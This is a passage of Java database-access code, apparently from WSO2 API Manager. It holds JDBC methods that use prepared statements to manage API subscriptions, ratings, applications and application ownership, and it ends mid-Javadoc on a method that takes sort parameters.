apiIdentifier.getApiName()); ps.setString(3, apiIdentifier.getVersion()); ps.setString(4, loginUserName); int tenantId; tenantId = APIUtil.getTenantId(loginUserName); ps.setInt(5, tenantId); rs = ps.executeQuery(); if (rs.next()) { isSubscribed = true; } } catch (SQLException e) { handleException("Error while checking if user has subscribed to the API ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return isSubscribed; } /** * @param providerName Name of the provider * @return UserApplicationAPIUsage of given provider * @throws org.wso2.carbon.apimgt.api.APIManagementException if failed to get * UserApplicationAPIUsage for given provider */ public UserApplicationAPIUsage[] getAllAPIUsageByProvider(String providerName) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; try { String sqlQuery = SQLConstants.GET_APP_API_USAGE_BY_PROVIDER_SQL; connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(sqlQuery); ps.setString(1, APIUtil.replaceEmailDomainBack(providerName)); result = ps.executeQuery(); Map<String, UserApplicationAPIUsage> userApplicationUsages = new TreeMap<String, UserApplicationAPIUsage>(); while (result.next()) { int subId = result.getInt("SUBSCRIPTION_ID"); Map<String, String> keyData = getAccessTokenData(subId); String accessToken = keyData.get("token"); String tokenStatus = keyData.get("status"); String userId = result.getString("USER_ID"); String application = result.getString("APPNAME"); int appId = result.getInt("APPLICATION_ID"); String subStatus = result.getString("SUB_STATUS"); String subsCreateState = result.getString("SUBS_CREATE_STATE"); String key = userId + "::" + application; UserApplicationAPIUsage usage = userApplicationUsages.get(key); if (usage == null) { usage = new UserApplicationAPIUsage(); usage.setUserId(userId); usage.setApplicationName(application); usage.setAppId(appId); usage.setAccessToken(accessToken); usage.setAccessTokenStatus(tokenStatus); userApplicationUsages.put(key, usage); } APIIdentifier apiId = new APIIdentifier(result.getString("API_PROVIDER"), result.getString 
("API_NAME"), result.getString("API_VERSION")); SubscribedAPI apiSubscription = new SubscribedAPI(new Subscriber(userId), apiId); apiSubscription.setSubStatus(subStatus); apiSubscription.setSubCreatedStatus(subsCreateState); apiSubscription.setUUID(result.getString("SUB_UUID")); apiSubscription.setTier(new Tier(result.getString("SUB_TIER_ID"))); Application applicationObj = new Application(result.getString("APP_UUID")); apiSubscription.setApplication(applicationObj); usage.addApiSubscriptions(apiSubscription); } return userApplicationUsages.values().toArray(new UserApplicationAPIUsage[userApplicationUsages.size()]); } catch (SQLException e) { handleException("Failed to find API Usage for :" + providerName, e); return null; } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } } /** * @param apiName Name of the API * @param apiVersion Version of the API * @param provider Name of API creator * @return All subscriptions of a given API * @throws org.wso2.carbon.apimgt.api.APIManagementException */ public List<SubscribedAPI> getSubscriptionsOfAPI(String apiName, String apiVersion, String provider) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; List<SubscribedAPI> subscriptions = new ArrayList<>(); try { String sqlQuery = SQLConstants.GET_SUBSCRIPTIONS_OF_API_SQL; connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(sqlQuery); ps.setString(1, apiName); ps.setString(2, apiVersion); ps.setString(3, provider); result = ps.executeQuery(); while (result.next()) { APIIdentifier apiId = new APIIdentifier(result.getString("API_PROVIDER"), apiName, apiVersion); Subscriber subscriber = new Subscriber(result.getString("USER_ID")); SubscribedAPI subscription = new SubscribedAPI(subscriber, apiId); subscription.setUUID(result.getString("SUB_UUID")); subscription.setSubStatus(result.getString("SUB_STATUS")); subscription.setSubCreatedStatus(result.getString("SUBS_CREATE_STATE")); subscription.setTier(new Tier(result.getString("SUB_TIER_ID"))); subscription.setCreatedTime(result.getString("SUB_CREATED_TIME")); Application application = new Application(result.getInt("APPLICATION_ID")); application.setName(result.getString("APPNAME")); subscription.setApplication(application); subscriptions.add(subscription); } } catch (SQLException e) { handleException("Error occurred while reading subscriptions of API: " + apiName + ':' + apiVersion, e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscriptions; } private void updateOAuthConsumerApp(String appName, String callbackUrl) throws IdentityOAuthAdminException, APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; String sqlStmt = SQLConstants.UPDATE_OAUTH_CONSUMER_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(sqlStmt); prepStmt.setString(1, callbackUrl); prepStmt.setString(2, appName); prepStmt.execute(); connection.commit(); } catch (SQLException e) { handleException("Error when updating OAuth consumer App for " + appName, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } private boolean isDuplicateConsumer(String consumerKey) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rSet = null; String sqlQuery = SQLConstants.GET_ALL_OAUTH_CONSUMER_APPS_SQL; boolean isDuplicateConsumer = false; try { connection = 
APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, consumerKey); rSet = prepStmt.executeQuery(); if (rSet.next()) { isDuplicateConsumer = true; } } catch (SQLException e) { handleException("Error when reading the application information from" + " the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rSet); } return isDuplicateConsumer; } public int addApplication(Application application, String userId) throws APIManagementException { Connection conn = null; int applicationId = 0; String loginUserName = getLoginUserName(userId); try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); applicationId = addApplication(application, loginUserName, conn); if (multiGroupAppSharingEnabled) { Subscriber subscriber = getSubscriber(userId); String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); updateGroupIDMappings(conn, applicationId, application.getGroupId(), tenantDomain); } conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the add Application ", e1); } } handleException("Failed to add Application", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } return applicationId; } public void addRating(APIIdentifier apiId, int rating, String user) throws APIManagementException { Connection conn = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); addRating(apiId, rating, user, conn); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the add API rating ", e1); } } handleException("Failed to add API rating", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } } /** * @param apiIdentifier API Identifier * @param rating Rating value * @param userId User Id * @throws APIManagementException if failed to add API rating */ public void addRating(APIIdentifier apiIdentifier, int rating, String userId, Connection conn) throws APIManagementException, SQLException { PreparedStatement ps = null; PreparedStatement psSelect = null; ResultSet rs = null; try { int tenantId; tenantId = APIUtil.getTenantId(userId); //Get subscriber Id Subscriber subscriber = getSubscriber(userId, tenantId, conn); if (subscriber == null) { String msg = "Could not load Subscriber records for: " + userId; log.error(msg); throw new APIManagementException(msg); } int apiId; apiId = getAPIID(apiIdentifier, conn); if (apiId == -1) { String msg = "Could not load API record for: " + apiIdentifier.getApiName(); log.error(msg); throw new APIManagementException(msg); } boolean userRatingExists = false; //This query checks whether a rating already exists for the user in the AM_API_RATINGS table String sqlQuery = SQLConstants.GET_API_RATING_SQL; psSelect = conn.prepareStatement(sqlQuery); psSelect.setInt(1, apiId); psSelect.setInt(2, subscriber.getId()); rs = psSelect.executeQuery(); while (rs.next()) { userRatingExists = true; } String sqlAddQuery; if (!userRatingExists) { //This query inserts into the AM_API_RATINGS table sqlAddQuery = SQLConstants.APP_API_RATING_SQL; } else { //This query updates the AM_API_RATINGS table sqlAddQuery = SQLConstants.UPDATE_API_RATING_SQL; } // Adding data to the AM_API_RATINGS table ps = conn.prepareStatement(sqlAddQuery); ps.setInt(1, rating); ps.setInt(2, apiId); ps.setInt(3, subscriber.getId()); ps.executeUpdate(); } catch (SQLException e) { handleException("Failed to add 
API rating of the user:" + userId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); APIMgtDBUtil.closeAllConnections(psSelect, null, null); } } public void removeAPIRating(APIIdentifier apiId, String user) throws APIManagementException { Connection conn = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); removeAPIRating(apiId, user, conn); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the add Application ", e1); } } handleException("Failed to add Application", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } } /** * @param apiIdentifier API Identifier * @param userId User Id * @throws APIManagementException if failed to add Application */ public void removeAPIRating(APIIdentifier apiIdentifier, String userId, Connection conn) throws APIManagementException, SQLException { PreparedStatement ps = null; PreparedStatement psSelect = null; ResultSet rs = null; try { int tenantId; int rateId = -1; tenantId = APIUtil.getTenantId(userId); //Get subscriber Id Subscriber subscriber = getSubscriber(userId, tenantId, conn); if (subscriber == null) { String msg = "Could not load Subscriber records for: " + userId; log.error(msg); throw new APIManagementException(msg); } //Get API Id int apiId = -1; apiId = getAPIID(apiIdentifier, conn); if (apiId == -1) { String msg = "Could not load API record for: " + apiIdentifier.getApiName(); log.error(msg); throw new APIManagementException(msg); } //This query to check the ratings already exists for the user in the AM_API_RATINGS table String sqlQuery = SQLConstants.GET_RATING_ID_SQL; psSelect = conn.prepareStatement(sqlQuery); psSelect.setInt(1, apiId); psSelect.setInt(2, subscriber.getId()); rs = psSelect.executeQuery(); while (rs.next()) { rateId = rs.getInt("RATING_ID"); } String sqlAddQuery; if (rateId != -1) { //This query to delete the specific rate row from the AM_API_RATINGS table sqlAddQuery = SQLConstants.REMOVE_RATING_SQL; // Adding data to the AM_API_RATINGS table ps = conn.prepareStatement(sqlAddQuery); ps.setInt(1, rateId); ps.executeUpdate(); } } catch (SQLException e) { handleException("Failed to delete API rating", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, null); APIMgtDBUtil.closeAllConnections(psSelect, null, rs); } } public int getUserRating(APIIdentifier apiId, String user) throws APIManagementException { Connection conn = null; int userRating = 0; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); userRating = getUserRating(apiId, user, conn); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback getting user ratings ", e1); } } handleException("Failed to get user ratings", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } return userRating; } /** * @param apiIdentifier API Identifier * @param userId User Id * @throws APIManagementException if failed to add Application */ public int getUserRating(APIIdentifier apiIdentifier, String userId, Connection conn) throws APIManagementException, SQLException { PreparedStatement ps = null; ResultSet rs = null; int userRating = 0; try { int tenantId; tenantId = APIUtil.getTenantId(userId); //Get subscriber Id Subscriber subscriber = getSubscriber(userId, tenantId, conn); if (subscriber == null) { String msg = "Could not load Subscriber records for: " + userId; log.error(msg); throw new 
APIManagementException(msg); } //Get API Id int apiId = -1; apiId = getAPIID(apiIdentifier, conn); if (apiId == -1) { String msg = "Could not load API record for: " + apiIdentifier.getApiName(); log.error(msg); throw new APIManagementException(msg); } //This query reads the user's rating from the AM_API_RATINGS table String sqlQuery = SQLConstants.GET_RATING_SQL; // Reading the rating from the AM_API_RATINGS table ps = conn.prepareStatement(sqlQuery); ps.setInt(1, subscriber.getId()); ps.setInt(2, apiId); rs = ps.executeQuery(); while (rs.next()) { userRating = rs.getInt("RATING"); } } catch (SQLException e) { handleException("Failed to get user rating", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); } return userRating; } public float getAverageRating(APIIdentifier apiId) throws APIManagementException { Connection conn = null; float avrRating = 0; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); avrRating = getAverageRating(apiId, conn); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback getting user ratings ", e1); } } handleException("Failed to get user ratings", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } return avrRating; } public float getAverageRating(int apiId) throws APIManagementException { Connection conn = null; float avrRating = 0; PreparedStatement ps = null; ResultSet rs = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); if (apiId == -1) { String msg = "Invalid APIId : " + apiId; log.error(msg); return Float.NEGATIVE_INFINITY; } //This query reads the average rating from the AM_API_RATINGS table String sqlQuery = SQLConstants.GET_AVERAGE_RATING_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); rs = ps.executeQuery(); while (rs.next()) { avrRating = rs.getFloat("RATING"); } } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback getting user ratings ", e1); } } handleException("Failed to get user ratings", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return avrRating; } /** * @param apiIdentifier API Identifier * @throws APIManagementException if failed to get the average rating */ public float getAverageRating(APIIdentifier apiIdentifier, Connection conn) throws APIManagementException, SQLException { PreparedStatement ps = null; ResultSet rs = null; float avrRating = 0; try { //Get API Id int apiId; apiId = getAPIID(apiIdentifier, conn); if (apiId == -1) { String msg = "Could not load API record for: " + apiIdentifier.getApiName(); log.error(msg); return Float.NEGATIVE_INFINITY; } //This query reads the average rating from the AM_API_RATINGS table String sqlQuery = SQLConstants.GET_AVERAGE_RATING_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); rs = ps.executeQuery(); while (rs.next()) { avrRating = rs.getFloat("RATING"); } } catch (SQLException e) { handleException("Failed to get the average rating", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); } BigDecimal decimal = new BigDecimal(avrRating); return Float.parseFloat(decimal.setScale(1, BigDecimal.ROUND_UP).toString()); } /** * @param application Application * @param userId User Id * @throws APIManagementException if failed to add Application */ public int addApplication(Application application, String userId, Connection conn) throws APIManagementException, SQLException { PreparedStatement ps = null; conn.setAutoCommit(false); ResultSet rs = null; int applicationId = 0; try { int tenantId = 
APIUtil.getTenantId(userId); //Get subscriber Id Subscriber subscriber = getSubscriber(userId, tenantId, conn); if (subscriber == null) { String msg = "Could not load Subscriber records for: " + userId; log.error(msg); throw new APIManagementException(msg); } //This query to update the AM_APPLICATION table String sqlQuery = SQLConstants.APP_APPLICATION_SQL; // Adding data to the AM_APPLICATION table //ps = conn.prepareStatement(sqlQuery); ps = conn.prepareStatement(sqlQuery, new String[]{"APPLICATION_ID"}); if (conn.getMetaData().getDriverName().contains("PostgreSQL")) { ps = conn.prepareStatement(sqlQuery, new String[]{"application_id"}); } ps.setString(1, application.getName()); ps.setInt(2, subscriber.getId()); ps.setString(3, application.getTier()); ps.setString(4, application.getCallbackUrl()); ps.setString(5, application.getDescription()); if (APIConstants.DEFAULT_APPLICATION_NAME.equals(application.getName())) { ps.setString(6, APIConstants.ApplicationStatus.APPLICATION_APPROVED); } else { ps.setString(6, APIConstants.ApplicationStatus.APPLICATION_CREATED); } String groupId = application.getGroupId(); if (multiGroupAppSharingEnabled) { // setting an empty groupId since groupid's should be saved in groupId mapping table groupId = ""; } ps.setString(7, groupId); ps.setString(8, subscriber.getName()); Timestamp timestamp = new Timestamp(System.currentTimeMillis()); ps.setTimestamp(9, timestamp); ps.setTimestamp(10, timestamp); ps.setString(11, UUID.randomUUID().toString()); ps.setString(12, String.valueOf(application.getTokenType())); ps.executeUpdate(); rs = ps.getGeneratedKeys(); while (rs.next()) { applicationId = Integer.parseInt(rs.getString(1)); } //Adding data to AM_APPLICATION_ATTRIBUTES table if( application.getApplicationAttributes() != null) { addApplicationAttributes(conn, application.getApplicationAttributes(), applicationId, tenantId); } } catch (SQLException e) { handleException("Failed to add Application", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); } return applicationId; } public void updateApplication(Application application) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; PreparedStatement preparedStatement = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); //This query to update the AM_APPLICATION table String sqlQuery = SQLConstants.UPDATE_APPLICATION_SQL; // Adding data to the AM_APPLICATION table ps = conn.prepareStatement(sqlQuery); ps.setString(1, application.getName()); ps.setString(2, application.getTier()); ps.setString(3, application.getCallbackUrl()); ps.setString(4, application.getDescription()); //TODO need to find the proper user who updates this application. 
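// The user performing the update is deliberately passed as null until the TODO above is resolved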
ps.setString(5, null); ps.setTimestamp(6, new Timestamp(System.currentTimeMillis())); ps.setString(7, application.getTokenType()); ps.setInt(8, application.getId()); ps.executeUpdate(); if (multiGroupAppSharingEnabled) { Subscriber subscriber = application.getSubscriber(); String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); updateGroupIDMappings(conn, application.getId(), application.getGroupId(), tenantDomain); } Subscriber subscriber = application.getSubscriber(); String domain = MultitenantUtils.getTenantDomain(subscriber.getName()); int tenantId = IdentityTenantUtil.getTenantId(domain); preparedStatement = conn.prepareStatement(SQLConstants.REMOVE_APPLICATION_ATTRIBUTES_SQL); preparedStatement.setInt(1,application.getId()); preparedStatement.execute(); if (log.isDebugEnabled()) { log.debug("Old attributes of application - " + application.getName() + " are removed"); } if (application.getApplicationAttributes() != null && !application.getApplicationAttributes().isEmpty()) { addApplicationAttributes(conn, application.getApplicationAttributes(), application.getId(), tenantId); } conn.commit(); updateOAuthConsumerApp(application.getName(), application.getCallbackUrl()); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the update Application ", e1); } } handleException("Failed to update Application", e); } catch (IdentityOAuthAdminException e) { handleException("Failed to update OAuth Consumer Application", e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, null); APIMgtDBUtil.closeAllConnections(preparedStatement,conn,null); } } /** * Update the status of the Application creation process * * @param applicationId * @param status * @throws APIManagementException */ public void updateApplicationStatus(int applicationId, String status) throws APIManagementException { Connection conn = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String updateSqlQuery = SQLConstants.UPDATE_APPLICATION_STATUS_SQL; ps = conn.prepareStatement(updateSqlQuery); ps.setString(1, status); ps.setInt(2, applicationId); ps.executeUpdate(); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the update Application ", e1); } } handleException("Failed to update Application", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } /** * get the status of the Application creation process * * @param appName * @return * @throws APIManagementException */ public String getApplicationStatus(String appName, String userId) throws APIManagementException { int applicationId = getApplicationId(appName, userId); return getApplicationStatusById(applicationId); } /** * get the status of the Application creation process given the application Id * * @param applicationId Id of the Application * @return * @throws APIManagementException */ public String getApplicationStatusById(int applicationId) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; String status = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); String sqlQuery = SQLConstants.GET_APPLICATION_STATUS_BY_ID_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, applicationId); resultSet = ps.executeQuery(); while (resultSet.next()) { status = resultSet.getString("APPLICATION_STATUS"); } conn.commit(); } catch 
(SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the update Application ", e1); } } handleException("Failed to update Application", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return status; } /** * Check whether given application name is available under current subscriber or group * * @param appName application name * @param username subscriber * @param groupId group of the subscriber * @return true if application is available for the subscriber * @throws APIManagementException if failed to get applications for given subscriber */ public boolean isApplicationExist(String appName, String username, String groupId) throws APIManagementException { if (username == null) { return false; } Subscriber subscriber = getSubscriber(username); Connection connection = null; PreparedStatement preparedStatement = null; ResultSet resultSet = null; int appId = 0; String sqlQuery = SQLConstants.GET_APPLICATION_ID_PREFIX; String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?))"; String whereClauseWithGroupIdCaseInsensitive = " AND (APP.GROUP_ID = ? " + "OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND LOWER(SUB.USER_ID) = LOWER(?)))"; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? ) " + "OR (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM AM_APPLICATION WHERE GROUP_ID = ?)))"; String whereClauseWithMultiGroupIdCaseInsensitive = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID " + "FROM AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) " + "OR (LOWER(SUB.USER_ID) = LOWER(?))" + "OR (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM AM_APPLICATION WHERE GROUP_ID = ?)))"; String whereClause = " AND SUB.USER_ID = ? "; String whereClauseCaseInsensitive = " AND LOWER(SUB.USER_ID) = LOWER(?) 
"; try { connection = APIMgtDBUtil.getConnection(); if (!StringUtils.isEmpty(groupId)) { if (multiGroupAppSharingEnabled) { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithMultiGroupIdCaseInsensitive; } else { sqlQuery += whereClauseWithMultiGroupId; } String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String[] grpIdArray = groupId.split(","); int noOfParams = grpIdArray.length; preparedStatement = fillQueryParams(connection, sqlQuery, grpIdArray, 2); preparedStatement.setString(1, appName); int paramIndex = noOfParams + 1; preparedStatement.setString(++paramIndex, tenantDomain); preparedStatement.setString(++paramIndex, subscriber.getName()); preparedStatement.setString(++paramIndex, tenantDomain + '/' + groupId); } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithGroupIdCaseInsensitive; } else { sqlQuery += whereClauseWithGroupId; } preparedStatement = connection.prepareStatement(sqlQuery); preparedStatement.setString(1, appName); preparedStatement.setString(2, groupId); preparedStatement.setString(3, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseCaseInsensitive; } else { sqlQuery += whereClause; } preparedStatement = connection.prepareStatement(sqlQuery); preparedStatement.setString(1, appName); preparedStatement.setString(2, subscriber.getName()); } resultSet = preparedStatement.executeQuery(); if (resultSet.next()) { appId = resultSet.getInt("APPLICATION_ID"); } if (appId > 0) { return true; } } catch (SQLException e) { handleException("Error while getting the id of " + appName + " from the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, connection, resultSet); } return false; } /** * Check whether the new user has an application * * @param appName application name * @param username subscriber * @return true if application is available for the subscriber * @throws APIManagementException if failed to get applications for given subscriber */ public boolean isApplicationOwnedBySubscriber(String appName, String username) throws APIManagementException { if (username == null) { return false; } Subscriber subscriber = getSubscriber(username); Connection connection = null; PreparedStatement preparedStatement = null; ResultSet resultSet = null; int appId = 0; String sqlQuery = SQLConstants.GET_APPLICATION_ID_PREFIX; String whereClause = " AND SUB.USER_ID = ? "; String whereClauseCaseInsensitive = " AND LOWER(SUB.USER_ID) = LOWER(?) "; try { connection = APIMgtDBUtil.getConnection(); if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseCaseInsensitive; } else { sqlQuery += whereClause; } preparedStatement = connection.prepareStatement(sqlQuery); preparedStatement.setString(1, appName); preparedStatement.setString(2, subscriber.getName()); resultSet = preparedStatement.executeQuery(); if (resultSet.next()) { appId = resultSet.getInt("APPLICATION_ID"); } if (appId > 0) { return true; } } catch (SQLException e) { handleException("Error while getting the id of " + appName + " from the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, connection, resultSet); } return false; } /** * @param username Subscriber * @return ApplicationId for given appname. * @throws APIManagementException if failed to get Applications for given subscriber. 
*/ public int getApplicationId(String appName, String username) throws APIManagementException { if (username == null) { return 0; } Subscriber subscriber = getSubscriber(username); Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; int appId = 0; String sqlQuery = SQLConstants.GET_APPLICATION_ID_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setInt(1, subscriber.getId()); prepStmt.setString(2, appName); rs = prepStmt.executeQuery(); while (rs.next()) { appId = rs.getInt("APPLICATION_ID"); } } catch (SQLException e) { handleException("Error when getting the application id from" + " the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return appId; } /** * Find the name of the application by Id * * @param applicationId - applicatoin id * @return - application name * @throws APIManagementException */ public String getApplicationNameFromId(int applicationId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String appName = null; String sqlQuery = SQLConstants.GET_APPLICATION_NAME_FROM_ID_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setInt(1, applicationId); rs = prepStmt.executeQuery(); while (rs.next()) { appName = rs.getString("NAME"); } } catch (SQLException e) { handleException("Error when getting the application name for id " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return appName; } public int getAllApplicationCount(Subscriber subscriber, String groupingId, String search) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet resultSet = null; String sqlQuery = null; try { connection = APIMgtDBUtil.getConnection(); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_APPLICATIONS_COUNNT_CASESENSITVE_WITH_MULTIGROUPID; } else { sqlQuery = SQLConstants.GET_APPLICATIONS_COUNNT_NONE_CASESENSITVE_WITH_MULTIGROUPID; } String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String[] grpIdArray = groupingId.split(","); int noOfParams = grpIdArray.length; prepStmt = fillQueryParams(connection, sqlQuery, grpIdArray, 1); prepStmt.setString(++noOfParams, tenantDomain); prepStmt.setString(++noOfParams, subscriber.getName()); prepStmt.setString(++noOfParams, "%" + search + "%"); } else { if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_APPLICATIONS_COUNNT_CASESENSITVE_WITHGROUPID; } else { sqlQuery = SQLConstants.GET_APPLICATIONS_COUNNT_NONE_CASESENSITVE_WITHGROUPID; } prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, groupingId); prepStmt.setString(2, subscriber.getName()); prepStmt.setString(3, "%" + search + "%"); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_APPLICATIONS_COUNNT_CASESENSITVE; } else { sqlQuery = SQLConstants.GET_APPLICATIONS_COUNNT_NONE_CASESENSITVE; } prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, subscriber.getName()); prepStmt.setString(2, "%" + search + "%"); } resultSet = prepStmt.executeQuery(); int applicationCount = 0; if (resultSet != null) { while (resultSet.next()) { applicationCount = resultSet.getInt("count"); } } if (applicationCount > 
0) { return applicationCount; } } catch (SQLException e) { handleException("Failed to get applicaiton count : ", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, resultSet); } return 0; } /** * Returns all applications created by given user Id * * @param userId * @return * @throws APIManagementException */ public Application[] getApplicationsByOwner(String userId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String appName = null; Application[] applications = null; String sqlQuery = SQLConstants.GET_APPLICATIONS_BY_OWNER; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, userId); rs = prepStmt.executeQuery(); ArrayList<Application> applicationsList = new ArrayList<Application>(); Application application; while (rs.next()) { application = new Application(rs.getString("UUID")); application.setName(rs.getString("NAME")); application.setOwner(rs.getString("CREATED_BY")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setGroupId(rs.getString("GROUP_ID")); if (multiGroupAppSharingEnabled) { application.setGroupId(getGroupId(rs.getInt("APPLICATION_ID"))); } applicationsList.add(application); } applications = applicationsList.toArray(new Application[applicationsList.size()]); } catch (SQLException e) { handleException("Error when getting the application name for id " + userId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return applications; } /** * Returns all applications created by given user Id * * @param userName * @return * @throws APIManagementException */ public boolean updateApplicationOwner(String userName, Application application) throws APIManagementException { boolean isAppUpdated = false; Connection connection = null; PreparedStatement prepStmt = null; String appName = null; String sqlQuery = SQLConstants.UPDATE_APPLICATION_OWNER; try { Subscriber subscriber = getSubscriber(userName); if (subscriber != null) { int subscriberId = getSubscriber(userName).getId(); connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, userName); prepStmt.setInt(2, subscriberId); prepStmt.setString(3, application.getUUID()); prepStmt.executeUpdate(); isAppUpdated = true; } else { String errorMessage = "Error when retrieving subscriber details for user " + userName; handleException(errorMessage, new APIManagementException(errorMessage)); } } catch (SQLException e) { handleException("Error when updating application owner for user " + userName, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } return isAppUpdated; } /** * #TODO later we might need to use only this method. * * @param subscriber The subscriber. * @param groupingId The groupId to which the applications must belong. * @param start The start index. * @param offset The offset. * @param search The search string. * @param sortOrder The sort order. * @param sortColumn The sort column. * @return Application[] The array of applications. 
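* Note: sortColumn and sortOrder are substituted directly into the query string, so they are expected to be pre-sanitized by the caller.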
